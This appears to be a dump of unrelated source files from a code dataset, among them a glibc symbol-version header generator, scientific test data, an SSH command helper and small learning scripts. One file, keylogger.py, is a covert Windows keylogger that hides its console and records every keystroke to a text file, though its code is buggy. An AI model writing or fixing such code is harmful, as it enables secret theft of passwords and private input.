file rt/Versions in\n # glibc source refers to them being moved from librt to libc,\n # but left behind for backwards compatibility\n if f.split(\"/\")[-1].startswith(\"librt\"):\n file_data = [x for x in file_data if not starts_with_any(x, {'clock_getcpuclockid', 'clock_nanosleep', 'clock_getres', 'clock_settime', 'clock_gettime'})]\n\n data += file_data\n\n\n syms = {}\n dupes = []\n\n for line in data:\n sym, ver = line.split(\"@@\")\n\n if sym not in syms:\n syms[sym] = ver\n elif syms[sym] != ver:\n dupes.append(line)\n\n if dupes:\n raise Exception(\"duplicate incompatible symbol versions found: \" + str(dupes))\n\n return syms\n\ndef generate_header_string(syms, missingFuncs):\n pthread_funcs_in_libc_so = {\n \"pthread_attr_destroy\",\n \"pthread_attr_init\",\n \"pthread_attr_getdetachstate\",\n \"pthread_attr_setdetachstate\",\n \"pthread_attr_getinheritsched\",\n \"pthread_attr_setinheritsched\",\n \"pthread_attr_getschedparam\",\n \"pthread_attr_setschedparam\",\n \"pthread_attr_getschedpolicy\",\n \"pthread_attr_setschedpolicy\",\n \"pthread_attr_getscope\",\n \"pthread_attr_setscope\",\n \"pthread_condattr_destroy\",\n \"pthread_condattr_init\",\n \"pthread_cond_broadcast\",\n \"pthread_cond_destroy\",\n \"pthread_cond_init\",\n \"pthread_cond_signalpthread_cond_wait\",\n \"pthread_cond_timedwait\",\n \"pthread_equal\",\n \"pthread_exit\",\n \"pthread_getschedparam\",\n \"pthread_setschedparam\",\n \"pthread_mutex_destroy\",\n \"pthread_mutex_init\",\n \"pthread_mutex_lock\",\n \"pthread_mutex_unlock\",\n \"pthread_self\",\n \"pthread_setcancelstate\",\n \"pthread_setcanceltype\",\n \"pthread_attr_init\",\n \"__register_atfork\",\n \"pthread_cond_init pthread_cond_destroy\",\n \"pthread_cond_wait pthread_cond_signal\",\n \"pthread_cond_broadcast pthread_cond_timedwait\"\n }\n\n pthread_symbols_used_as_weak_in_libgcc = {\n \"pthread_setspecific\",\n \"__pthread_key_create\",\n \"pthread_getspecific\",\n \"pthread_key_create\",\n \"pthread_once\"\n }\n\n pthread_symbols_used_as_weak_in_libstdcpp = {\n \"pthread_setspecific\",\n \"pthread_key_delete\",\n \"__pthread_key_create\",\n \"pthread_once\",\n \"pthread_key_create\",\n \"pthread_getspecific\",\n \"pthread_join\",\n \"pthread_detach\",\n \"pthread_create\"\n }\n\n strings = [\n \"#if !defined(SET_GLIBC_LINK_VERSIONS_HEADER) && !defined(__ASSEMBLER__)\",\n \"#define SET_GLIBC_LINK_VERSIONS_HEADER\"\n ]\n\n for sym in sorted(syms.keys()):\n line = '__asm__(\".symver ' + sym + ',' + sym + '@' + syms[sym] + '\");'\n\n if sym in pthread_funcs_in_libc_so or sym in pthread_symbols_used_as_weak_in_libstdcpp or sym in pthread_symbols_used_as_weak_in_libgcc:\n line = \"#ifdef _REENTRANT\\n\" + line + \"\\n#endif\"\n if sym in pthread_symbols_used_as_weak_in_libgcc:\n line = \"#ifndef IN_LIBGCC2\\n\" + line + \"\\n#endif\"\n if sym in pthread_symbols_used_as_weak_in_libstdcpp:\n line = \"#ifndef _GLIBCXX_SHARED\\n\" + line + \"\\n#endif\"\n\n strings.append(line)\n\n for sym in sorted(list(missingFuncs)):\n strings.append('__asm__(\".symver ' + sym + ',' + sym + '@GLIBC_WRAP_ERROR_SYMBOL_NOT_PRESENT_IN_REQUESTED_VERSION\");')\n\n strings.append(\"#endif\")\n strings.append(\"\")\n\n return \"\\n\".join(strings)\n\ndef apply_patches(glibcDir, version):\n patches_table = {\n # patch x <= version <= y\n \"extern_inline_addition.diff\": (Version(2, 5), Version(2, 5, 1)),\n \"fix_obstack_compat.diff\": (Version(2, 5), Version(2, 17)),\n \"no-pattern-rule-mixing.diff\": (Version(2, 5), Version(2, 10, 2)),\n \"fix_linker_failure.diff\": 
(Version(2, 5), Version(2, 9)),\n \"remove_ctors_dtors.diff\": (Version(2, 5), Version(2, 12, 2)),\n \"fix_bad_version_checks_2.5.diff\": (Version(2, 5), Version(2, 6, 1)),\n \"fix_bad_version_checks_2.9.diff\": (Version(2, 7), Version(2, 9)),\n \"fix_bad_version_checks_2.10.diff\": (Version(2, 10), Version(2, 12, 2)),\n \"fix_bad_version_checks.diff\": (Version(2, 13), Version(2, 18)),\n \"hvsep-remove.diff\": (Version(2, 16), Version(2, 16)),\n \"cvs-common-symbols.diff\": (Version(2, 23), Version(2, 25)),\n }\n\n for patch, v_limits in patches_table.items():\n if v_limits[0] <= version <= v_limits[1]:\n patch_path = \"{}/patches/{}\".format(basePath, patch)\n subprocess.check_call([\"git\", \"apply\", patch_path], cwd=glibcDir)\n\n\ndef get_glibc_binaries(version):\n \"\"\"\n Downloads and builds the specified version (git tag) of glibc.\n Returns the installed folder.\n \"\"\"\n glibcDir = basePath + \"/glibc\"\n buildDir = basePath + \"/builds/\" + str(version) + \"/build\"\n installDir = basePath + \"/builds/\" + str(version) + \"/install\"\n\n if not os.path.exists(glibcDir):\n subprocess.check_call([\"git\", \"clone\", \"git://sourceware.org/git/glibc.git\", glibcDir], cwd=basePath)\n\n if not os.path.exists(installDir + \"/build_succeeded\"):\n subprocess.check_call([\"git\", \"reset\", \"--hard\", \"HEAD\"], cwd=glibcDir)\n subprocess.check_call([\"git\", \"clean\", \"-dxf\"], cwd=glibcDir)\n\n subprocess.check_call([\"git\", \"checkout\", str(version)], cwd=glibcDir)\n\n apply_patches(glibcDir, version)\n\n if os.path.exists(buildDir):\n shutil.rmtree(buildDir)\n os.makedirs(buildDir)\n\n if os.path.exists(installDir):\n shutil.rmtree(installDir)\n os.makedirs(installDir)\n\n env = copy.deepcopy(os.environ)\n env[\"CC\"] = \"gcc\"\n if Version(2, 5) <= version <= Version(2, 16):\n env[\"CFLAGS\"] = \"-U_FORTIFY_SOURCE -O2 -fno-stack-protector\"\n if Version(2, 5) <= version <= Version(2, 21):\n env[\"LDFLAGS\"] = \"-no-pie\"\n\n jobString = \"-j\" + str(multiprocessing.cpu_count())\n\n subprocess.check_call([glibcDir + \"/configure\", \"--disable-werror\", \"--disable-sanity-checks\"], cwd=buildDir, env=env)\n subprocess.check_call([\"make\", jobString], cwd=buildDir)\n subprocess.check_call([\"make\", \"install_root=\" + installDir, \"install\", jobString], cwd=buildDir)\n\n with open(installDir + \"/build_succeeded\", \"wb\") as f:\n pass\n\n return installDir\n\n\ndef check_have_required_programs():\n requiredPrograms = [\"gcc\", \"make\", \"git\", \"readelf\", \"grep\"]\n\n missing = []\n\n for p in requiredPrograms:\n if distutils.spawn.find_executable(p) is None:\n missing.append(p)\n\n if missing:\n raise Exception(\"missing programs: \" + str(missing) + \", please install via your os package manager\")\n\nclass Version(object):\n def __init__(self, *args):\n if len(args) > 3 or len(args) < 2:\n raise Exception(\"invalid version: \" + str(args))\n\n self.major = int(args[0])\n self.minor = int(args[1])\n\n if len(args) == 3:\n self.patch = int(args[2])\n else:\n self.patch = 0\n\n def version_as_str(self):\n s = str(self.major) + \".\" + str(self.minor)\n if self.patch != 0:\n s += \".\" + str(self.patch)\n\n return s\n\n def __str__(self):\n return \"glibc-\" + self.version_as_str()\n\n def __repr__(self):\n return self.__str__()\n\n def __hash__(self):\n return hash((self.major, self.minor, self.patch))\n\n def __lt__(self, other):\n return (self.major, self.minor, self.patch) < (other.major, other.minor, other.patch)\n\n def __le__(self, other):\n return (self.major, 
self.minor, self.patch) <= (other.major, other.minor, other.patch)\n\n def __gt__(self, other):\n return (self.major, self.minor, self.patch) > (other.major, other.minor, other.patch)\n\n def __ge__(self, other):\n return (self.major, self.minor, self.patch) >= (other.major, other.minor, other.patch)\n\n def __eq__(self, other):\n return (self.major, self.minor, self.patch) == (other.major, other.minor, other.patch)\n\n def __ne__(self, other):\n return (self.major, self.minor, self.patch) != (other.major, other.minor, other.patch)\n\n\nSUPPORTED_VERSIONS = [\n Version(2, 5),\n Version(2, 5, 1),\n Version(2, 6),\n Version(2, 6, 1),\n Version(2, 7),\n Version(2, 8),\n Version(2, 9),\n Version(2, 10, 2),\n Version(2, 11, 3),\n Version(2, 12, 2),\n Version(2, 13),\n Version(2, 14),\n Version(2, 14, 1),\n Version(2, 15),\n Version(2, 16),\n Version(2, 17),\n Version(2, 18),\n Version(2, 19),\n Version(2, 20),\n Version(2, 21),\n Version(2, 22),\n Version(2, 23),\n Version(2, 24),\n Version(2, 25),\n Version(2, 26),\n Version(2, 27),\n]\n\n\ndef main():\n check_have_required_programs()\n\n if len(sys.argv) > 1:\n print(\"Warning, requesting specific versions may mean you miss out on defining missing symbols\")\n requested_versions = [Version(*v.split('.')) for v in sys.argv[1:]]\n else:\n requested_versions = SUPPORTED_VERSIONS # build all by default\n\n versionHeadersPath = basePath + \"/version_headers\"\n if os.path.exists(versionHeadersPath):\n shutil.rmtree(versionHeadersPath)\n\n syms = {}\n for version in requested_versions:\n print(\"generating data for version:\", version)\n installDir = get_glibc_binaries(version)\n syms[version] = extract_versions_from_installed_folder(installDir, version)\n\n allsyms = set.union(set(), *syms.values())\n for version in requested_versions:\n print(\"writing header for version:\", version)\n missingFuncs = allsyms - set(syms[version].keys())\n headerData = generate_header_string(syms[version], missingFuncs)\n\n if not os.path.exists(versionHeadersPath):\n os.makedirs(versionHeadersPath)\n\n with open(versionHeadersPath + \"/force_link_glibc_\" + version.version_as_str() + \".h\", 'w') as f:\n f.write(headerData)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"glibc_version_header_gen.py","file_name":"glibc_version_header_gen.py","file_ext":"py","file_size_in_byte":11683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168142009","text":"import geomstats.backend as gs\nfrom geomstats.geometry.euclidean import Euclidean\nfrom geomstats.geometry.hyperboloid import Hyperboloid\nfrom geomstats.geometry.hypersphere import Hypersphere\nfrom geomstats.geometry.spd_matrices import (\n SPDAffineMetric,\n SPDEuclideanMetric,\n SPDLogEuclideanMetric,\n SPDMatrices,\n)\nfrom geomstats.learning.geometric_median import GeometricMedian\nfrom tests.data_generation import TestData\n\nEPSILON = 10e-6\n\n\nclass GeometricMedianTestData(TestData):\n def fit_test_data(self):\n estimator_0 = GeometricMedian(Euclidean(1))\n X_0 = gs.array(\n [\n [1.0 - 2 * EPSILON],\n [1.0 - EPSILON],\n [1.0 + EPSILON],\n [1.0 + 2 * EPSILON],\n [-100.0],\n ]\n )\n expected_0 = gs.array([1.0])\n\n space = SPDMatrices(1, equip=False)\n space.equip_with_metric(SPDEuclideanMetric)\n estimator_1 = GeometricMedian(space)\n X_1 = gs.array(\n [\n [[1.0 - 2 * EPSILON]],\n [[1.0 - EPSILON]],\n [[1.0 + EPSILON]],\n [[1.0 + 2 * EPSILON]],\n [[10.0]],\n ]\n )\n expected_1 = gs.array([[1.0]])\n\n space = SPDMatrices(2, equip=False)\n 
space.equip_with_metric(SPDAffineMetric)\n        estimator_2 = GeometricMedian(space)\n        X_2 = gs.array(\n            [\n                [[1.0 + EPSILON, 0.0], [0.0, 1.0 + EPSILON]],\n                [[1.0 - EPSILON, 0.0], [0.0, 1.0 - EPSILON]],\n                [[1.0, 0.0 + EPSILON], [0.0 + EPSILON, 1.0]],\n                [[1.0, 0.0 - EPSILON], [0.0 - EPSILON, 1.0]],\n                [[10.0, 0.0], [0.0, 10.0]],\n            ]\n        )\n        expected_2 = gs.array([[1.0, 0.0], [0.0, 1.0]])\n\n        smoke_data = [\n            dict(estimator=estimator_0, X=X_0, expected=expected_0),\n            dict(estimator=estimator_1, X=X_1, expected=expected_1),\n            dict(estimator=estimator_2, X=X_2, expected=expected_2),\n        ]\n\n        return self.generate_tests(smoke_data)\n\n    def fit_sanity_test_data(self):\n        spd_matrices = SPDMatrices(4, equip=False)\n        spd_matrices.equip_with_metric(SPDLogEuclideanMetric)\n        smoke_data = [\n            dict(\n                estimator=GeometricMedian(Euclidean(2)),\n            ),\n            dict(\n                estimator=GeometricMedian(Hyperboloid(3)),\n            ),\n            dict(\n                estimator=GeometricMedian(Hypersphere(4)),\n            ),\n            dict(\n                estimator=GeometricMedian(spd_matrices),\n            ),\n        ]\n\n        return self.generate_tests(smoke_data)\n","sub_path":"tests/data/geometric_median_data.py","file_name":"geometric_median_data.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"466236455","text":"#!/usr/bin/python3\n\nimport numpy as np\n\ndef V2L_SO_sensitivity_calculator_r1(N_LF,N_MF,N_HF,N_UHF,f_sky):\n    '''sensitivity calculator for Simons Observatory V2 Large telescope'''\n    '''vary the number of dichroic optics tubes in each band'''\n    '''by default you should use 7 total tubes'''\n    ## fixed variables for parameters you shouldn't vary\n    # sensitivity per band in uK-rt(s)\n    S_LF_27 = 20.8\n    S_LF_39 = 14.3\n    S_MF_90 = 6.5\n    S_MF_150 = 8.1\n    S_HF_150 = 6.9\n    S_HF_220 = 15.8\n    S_UHF_220 = 13.8\n    S_UHF_270 = 35.6\n    #Observing duration\n    n_years = 5.0\n    efficiency = 0.4*.5*.85 ## the product of 40% observing efficiency\n    ## 50% cuts retention\n    ## and keeping only 85% of the map area\n    ################\n    ## check that the total number of tubes is correct\n    total_tubes = N_LF+ N_MF+ N_HF+ N_UHF\n    if (N_LF+ N_MF+ N_HF+ N_UHF) != 7:\n        print(\"WARNING! You requested:\",total_tubes, \"optics tubes while V2 includes budget for 7\")\n    ## calculate the sensitivity in each band\n    S_27 = S_39 = S_90 = S_150 = S_220 = S_270 = 1e9 ## e.g., make the noise irrelevantly high by default\n    # include LF receiver contributions\n    S_27 = 1./np.sqrt( N_LF * S_LF_27**-2. + S_27**-2.)\n    S_39 = 1./np.sqrt( N_LF * S_LF_39**-2. + S_39**-2.)\n    # include MF receiver contributions\n    S_90 = 1./np.sqrt( N_MF * S_MF_90**-2. + S_90**-2.)\n    S_150 = 1./np.sqrt( N_MF * S_MF_150**-2. + S_150**-2.)\n    # include HF receiver contributions\n    S_150 = 1./np.sqrt( N_HF * S_HF_150**-2. + S_150**-2.)\n    S_220 = 1./np.sqrt( N_HF * S_HF_220**-2. + S_220**-2.)\n    # include UHF receiver contributions\n    S_220 = 1./np.sqrt( N_UHF * S_UHF_220**-2. + S_220**-2.)\n    S_270 = 1./np.sqrt( N_UHF * S_UHF_270**-2. + S_270**-2.)\n    ### calculate the Noise per arcminute, per band\n    integration_time = n_years *365.* 24. * 3600. * efficiency\n    sky_area = 4.*np.pi * (180/np.pi)**2. * 3600. 
* f_sky\n N_27 = S_27 * np.sqrt(sky_area / integration_time)\n N_39 = S_39 * np.sqrt(sky_area / integration_time)\n N_90 = S_90 * np.sqrt(sky_area / integration_time)\n N_150 = S_150 * np.sqrt(sky_area / integration_time)\n N_220 = S_220 * np.sqrt(sky_area / integration_time)\n N_270 = S_270 * np.sqrt(sky_area / integration_time)\n ## return these sensitivity and bands\n bands = np.array([27,39,90,150,220,270.]) ## in GHz\n noise_per_arcminute = np.array([N_27,N_39,N_90,N_150,N_220,N_270])\n return(bands,noise_per_arcminute)\n\n\n## example of running this code\nf_sky = 0.4 ## 16,500 square degrees\nN_LF = 1 ## number of tubes in the LF band (30/40 GHz)\nN_MF = 4 ## number of tubes in the MF band (90/150 GHz)\nN_HF = 1 ## number of tubes in the HF band (150/220 GHz)\nN_UHF = 1 ## number of tubes in the UHF band (220/270 GHz)\nband_centers_GHZ, map_noise_uk_arcmin = V2L_SO_sensitivity_calculator_r1(N_LF,N_MF,N_HF,N_UHF,f_sky)\nprint(\"band centers: \", band_centers_GHZ, \"[GHz]\")\nprint(\"map noise per band:\",map_noise_uk_arcmin, \"[uK/arcmin_CMB]\")\nprint(\"calcualted for f_sky = \",f_sky, \"-or-\", f_sky* 4.*np.pi * (180/np.pi)**2., \"degrees^2\")\n","sub_path":"Code/python_scripts/SO_noise_gen.py","file_name":"SO_noise_gen.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90144010","text":"import win32api\r\nimport win32console\r\nimport win32gui\r\nimport pythoncom, pyHook\r\nwin=win32console.GetconsoleWindow()\r\nwin32gui=ShowWindow(win,0)\r\n\r\ndef OnKeyboardEvent(event):\r\n if event.Ascii==5:\r\n _exit(1)\r\n if event.Ascii !=0 or 8:\r\n f=open('keylogging.txt','r+')\r\n buffer=f.read()\r\n f.close()\r\n f=open('keylogging.txt','w')\r\n keylog=chr(event.Ascii)\r\n if event.Ascii==13:\r\n keylog='\\n'\r\n buffer=buffer+keylog\r\n f.write(buffer)\r\n f.close()\r\nhm=pyhook.HookManager()\r\nhm.KeyDown=OnKeyboardEvent\r\nhm=HookKeyboard()\r\npythoncom.PumpMessages()","sub_path":"keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25958066","text":"import subprocess as subp\nimport shlex, sys, stat, os, socket, time, re\nimport dbglib as dbg\nimport config as cfg\n\ndef executeLocal(cmd, flog):\n cmd_split = shlex.split(cmd)\n p = subp.Popen(cmd_split, stdout=flog, stderr=flog)\n return p\n\ndef executeLocalBlock(cmd, flog):\n p = executeLocal(cmd, flog)\n p.wait()\n return p.returncode\n\ndef executeLocalBlockStdOut(cmd):\n return executeLocalBlock(cmd, sys.stdout)\n\ndef executeRemotely(cmd, flog, user, hostname, opt, script_name=\"./remote.bash\"):\n script_path = os.path.join(cfg.BUILD_DIR, script_name)\n\n f = open(script_path, 'w')\n print >> f, \"#!/bin/bash\"\n print >> f, \"ssh -oStrictHostKeyChecking=no %s@%s %s << 'ENDSSH'\" % (user, hostname, opt)\n print >> f, cmd\n print >> f, \"ENDSSH\"\n f.close()\n\n st = os.stat(script_path)\n os.chmod(script_path, st.st_mode | stat.S_IEXEC)\n p = subp.Popen(script_path, stdout=flog, stderr=flog)\n return p\n\ndef executeCmdUser(cmd, flog, hostname, script_name, username):\n if (hostname == \"localhost\") or (hostname == socket.gethostname()):\n p = executeLocal(cmd, flog)\n else:\n p = executeRemotely(cmd, flog, username, hostname, \"\", script_name)\n \n return p\n\ndef executeCmd(cmd, flog, hostname, script_name):\n if (hostname == \"localhost\") or (hostname == socket.gethostname()):\n p = 
executeLocal(cmd, flog)\n else:\n p = executeRemotely(cmd, flog, cfg.VM_USERNAME, hostname, \"\", script_name)\n \n return p\n\ndef executeCmdBlock(cmd, flog, hostname, script_name=\"./remote.bash\"):\n p = executeCmd(cmd, flog, hostname, script_name)\n return p.communicate()\n\ndef executeCmdBlockReturnCode(cmd, flog, hostname, script_name):\n p = executeCmd(cmd, flog, hostname, script_name)\n p.wait()\n return p.returncode\n\ndef executeCmdCheckReturnCode(cmd, flog, hostname, script_name):\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n if rv != 0:\n dbg.print_error(\"'%s' failed on machine '%s'\" % (cmd, hostname))\n return rv\n \n\ndef executeAndCheckOutput(cmd, flog, hostname, script_name, check_str):\n output, _ = executeCmdBlock(cmd, flog, hostname, script_name)\n m = re.search(check_str, output)\n return m != None\n\ndef executeCmdBlockWithRetry(cmd, max_retries, interval, flog, hostname, script_name):\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n retry_cnt = 1\n while (rv != 0) and (retry_cnt <= max_retries):\n time.sleep(interval)\n dbg.print_info(\"Retry # %d\" % retry_cnt)\n rv = executeCmdBlockReturnCode(cmd, flog, hostname, script_name)\n retry_cnt += 1\n return rv\n\ndef executeLocalGetOutput(cmd):\n p = executeLocal(cmd, subp.PIPE)\n (out, err) = p.communicate()\n return out\n\ndef waitProcGroupAndCheckExitCode(proc_l):\n failed_l = list()\n for p in proc_l:\n p.wait()\n if p.returncode != 0:\n failed_l.append(p)\n return failed_l\n\n","sub_path":"src/lib/execlib.py","file_name":"execlib.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491235054","text":"# -*- coding: utf-8 -*-\n\"\"\"A cross-platform way in GitHub workflows to extract package version.\"\"\"\nimport inspect\nimport os\nimport re\nimport sys\nfrom typing import Optional\nfrom typing import Pattern\n\n\nif re != sys: # need to protect the #nosec comment from being deleted by zimports\n import subprocess # nosec # B404 security implications are considered\n\nPATH_OF_CURRENT_FILE = os.path.dirname((inspect.stack()[0][1]))\n\n# python3 .github/workflows/extract_package_info.py package_name\n# python3 .github/workflows/extract_package_info.py package_version\n\n\ndef _extract_info(regex: Pattern[str]) -> str:\n with open(os.path.join(PATH_OF_CURRENT_FILE, os.pardir, os.pardir, \"setup.py\"), \"r\") as in_file:\n content = in_file.read()\n match = re.search(regex, content)\n if match is None:\n raise NotImplementedError(\"A match in setup.py should always be found.\")\n output = match.group(1)\n print(output) # allow-print\n return output\n\n\ndef package_name() -> str:\n regex = re.compile(r\" name=\\\"(\\w+)\\\"\")\n return _extract_info(regex)\n\n\ndef package_version() -> str:\n regex = re.compile(r\" version=\\\"(.+?)\\\"\")\n return _extract_info(regex)\n\n\ndef pip_install(test_pypi: Optional[bool] = False) -> None:\n args = [\"pip\", \"install\", f\"{package_name()}=={package_version()}\"]\n if test_pypi:\n args.extend(\n [\n \"--index-url\",\n \"https://test.pypi.org/simple/\",\n \"--extra-index-url\",\n \"https://pypi.org/simple\",\n ]\n )\n print(f\"About to run with args: {args}\") # allow-print\n results = subprocess.run(args) # nosec # B603 shell is false, but input is secure\n if results.returncode != 0:\n sys.exit(results.returncode)\n\n\ndef confirm_version_tag_not_present_on_remote() -> None:\n from git import (\n Repo,\n ) # only import it here so that 
the simpler functions can be called that don't rely on this extra dependency if they need to be called earlier in the workflow\n\n version = package_version()\n repo = Repo(os.path.join(PATH_OF_CURRENT_FILE, os.pardir, os.pardir))\n tags = repo.git.ls_remote(\"--tags\", \"origin\")\n split_tags = tags.split(\"\\n\")\n for iter_tag in split_tags:\n if iter_tag.endswith(f\"tags/{version}\") or iter_tag.endswith(f\"tags/v{version}\"):\n print(f\"Tag for {version} already exists on remote: {iter_tag}\") # allow-print\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n first_arg = sys.argv[1]\n if first_arg == \"package_name\":\n package_name()\n elif first_arg == \"package_version\":\n package_version()\n elif first_arg == \"install_from_test_pypi\":\n pip_install(test_pypi=True)\n elif first_arg == \"install_from_pypi\":\n pip_install()\n elif first_arg == \"confirm_version_tag_not_present_on_remote\":\n confirm_version_tag_not_present_on_remote()\n","sub_path":".github/workflows/extract_package_info.py","file_name":"extract_package_info.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536638436","text":"from model.videosModel import videosModel\nfrom model.moviecategorylist import moviecategorylist\nfrom core.faindController import faindController\nclass MainController(faindController):\n def execute(self):\n self.runFaind()\n def settings(self):\n self.model = videosModel()\n self.modellist = moviecategorylist()\n self.nameIndex = 2\n self.dir = ''\n self.editSectionName = 'Edit star'\n","sub_path":"controller/faind/MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"197143155","text":"#!/usr/bin/python3\n# coding: utf8\n\nimport sys, unicodedata\n\nspecials = {\n '%' : 'percent',\n '-' : 'minus',\n '_' : 'underscore',\n '>' : 'greater',\n '<' : 'less',\n ',' : 'comma',\n '.' : 'period',\n '$' : 'dollar',\n '!' : 'exclam',\n '?' 
: 'question',\n    '+' : 'plus',\n    '/' : 'slash',\n    '#' : 'numbersign',\n    '@' : 'at',\n    '|' : 'bar',\n    '`' : 'grave',\n    '~' : 'asciitilde',\n    '^' : 'asciicircum',\n    '&': 'ampersand',\n    '(' : 'parenleft',\n    ')' : 'parenright',\n    '[' : 'bracketleft',\n    ']' : 'bracketright',\n    '{' : 'braceleft',\n    '}' : 'braceright',\n    \"'\" : 'apostrophe',\n    '\"' : 'quotedbl',\n    '\\\\': 'backslash',\n    ':' : 'colon',\n    ';' : 'semicolon',\n    '=' : 'equal',\n    ' ' : 'space',\n    '*' : 'asterisk',\n    '♫' : 'Multi_key',\n    '\\t': 'tab',\n}\n\nfor l in sys.stdin.readlines():\n    l = l.strip('\\n')\n    if not l or l.startswith(\"#\"):\n        print(l)\n        continue\n    becomes = l[-1]\n    l = l[:-1]\n    sys.stdout.write(\"\")\n    for c in l:\n        sys.stdout.write(' <'+specials.get(c, c)+'>')\n    n = hex(ord(becomes))[2:].upper()\n    name = unicodedata.name(becomes)\n    sys.stdout.write(' : \"{}\" U{} # {}\\n'.format(becomes, n, name))\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"204440336","text":"from binascii import hexlify\n\nfrom stp_core.loop.eventually import eventually\nfrom plenum.common.constants import DOMAIN_LEDGER_ID\nfrom plenum.test.helper import waitForSufficientRepliesForRequests\n\n\ndef checkNodesHaveSameRoots(nodes, checkUnCommitted=True,\n                            checkCommitted=True):\n    def addRoot(root, collection):\n        if root:\n            collection.add(hexlify(root))\n        else:\n            collection.add(root)\n\n    if checkUnCommitted:\n        stateRoots = set()\n        txnRoots = set()\n        for node in nodes:\n            addRoot(node.getState(DOMAIN_LEDGER_ID).headHash, stateRoots)\n            addRoot(node.getLedger(DOMAIN_LEDGER_ID).uncommittedRootHash,\n                    txnRoots)\n\n        assert len(stateRoots) == 1\n        assert len(txnRoots) == 1\n\n    if checkCommitted:\n        stateRoots = set()\n        txnRoots = set()\n        for node in nodes:\n            addRoot(node.getState(DOMAIN_LEDGER_ID).committedHeadHash,\n                    stateRoots)\n            addRoot(node.getLedger(DOMAIN_LEDGER_ID).tree.root_hash,\n                    txnRoots)\n\n        assert len(stateRoots) == 1\n        assert len(txnRoots) == 1\n","sub_path":"plenum/test/batching_3pc/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"385839327","text":"from sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Read in the temperature data\ndf = pd.read_csv('./data/tem10y.csv', encoding=\"utf-8\")\n\n# Split the data into training and test sets\ntrain_year = (df[\"연\"] <= 2015)\ntest_year = (df[\"연\"] >= 2016)\ninterval = 6\n\n# Build training samples from the previous 6 days of data\ndef make_data(data):\n    x = [] # training data\n    y = [] # targets\n    temps = list(data[\"기온\"])\n    for i in range(len(temps)):\n        if i < interval: continue\n        y.append(temps[i])\n        xa = []\n        for p in range(interval):\n            d = i + p - interval\n            xa.append(temps[d])\n        x.append(xa)\n    return (x, y)\n\ntrain_x, train_y = make_data(df[train_year])\ntest_x, test_y = make_data(df[test_year])\n\nprint(type(train_x)) # list\n\nimport numpy as np\nprint(np.array(train_x).shape)\nprint(np.array(train_y).shape)\nprint(np.array(test_x).shape)\nprint(np.array(test_y).shape)\n\n# Linear regression analysis\n# lr = LinearRegression(normalize=True)\nfrom sklearn.ensemble import RandomForestRegressor\nlr = RandomForestRegressor() # 0.9068730711533413\nlr.fit(train_x, train_y) # train\npre_y = lr.predict(test_x) # predict\n\naaa = lr.score(test_x, test_y)\nprint(aaa) # 0.923475843513415\n\n# Plot the results\nplt.figure(figsize=(10, 6), 
dpi=100)\nplt.plot(test_y, c='r')\nplt.plot(pre_y, c='b')\nplt.savefig('tenki-kion-lr.png')\nplt.show()\n\n# Refine with a Keras DNN model\n# Refine with a Keras LSTM model\n","sub_path":"cslee201909/ml/m08_weather1.py","file_name":"m08_weather1.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"240262419","text":"# create excel in memory using openpyxl\n\nimport openpyxl, os\n\n# create a new workbook (held in memory until saved)\nworkbook = openpyxl.Workbook()\nprint(type(workbook))\n\nworksheet = workbook.active\nprint(type(worksheet))\n\nworksheet.title = 'Joey Excel Test'\n\nfor i in range(1, 10):\n    for j in range(1, 10):\n        worksheet.cell(row=i, column=j).value = str(i) + ' * '+ str(j) + ' = ' + str(i * j)\n\n# save the doc\nexcel_path = os.getcwd() + '\\\\joeytestexcel.xlsx'\nworkbook.save(excel_path)\n","sub_path":"Python编程快速上手/第十二章/py_004_createexcel.py","file_name":"py_004_createexcel.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"150399901","text":"import re\n\nhandle = open('..\\Files\\mbox-short.txt')\nexp = input('Enter a regular expression: ')\ncounter = 0\n\nfor line in handle:\n    line = line.rstrip()\n\n    if re.search(exp, line):\n        counter = counter + 1\n\nprint('The file had', counter, 'lines that matched', exp)\n","sub_path":"RegEx/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"599153621","text":"#!/usr/bin/python\n# rrd-to-leveldb.py\n# (c) 2014 flabbergast\n#\n# -> Edit as necessary!\n#\n# Takes either:\n# - the output of 'rrdtool dump ...' (an xml file)\n# OR\n# - the output of 'rrdtool xport ...' 
